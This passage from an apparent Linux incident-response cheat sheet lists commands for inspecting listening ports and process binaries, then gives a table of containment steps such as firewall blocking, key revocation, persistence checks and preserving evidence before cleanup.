ss -tlnp | grep <port>
What binary is PID running?
ls -la /proc/<PID>/exe
Kill a suspicious process
kill -9 <PID> # Only after you've documented it
Containment Actions
| Action | Command / Method |
|---|---|
| Block attacker IP at firewall | sudo ufw deny from <attacker-ip> |
| Isolate network (emergency) | sudo ip link set eth0 down — use only if critical |
| Change all passwords immediately | Start with root, then all service accounts |
| Revoke SSH keys | Clear authorized_keys, rotate all key pairs |
| Preserve evidence | Snapshot VM before cleanup; copy logs off-system first |
| Check for persistence | Cron jobs, services, authorized_keys, .bashrc, SUID |
Evidence first, then cleanup. Never wipe a system before taking a snapshot or copying logs. You need the evidence to understand what happened and prevent it from happening again.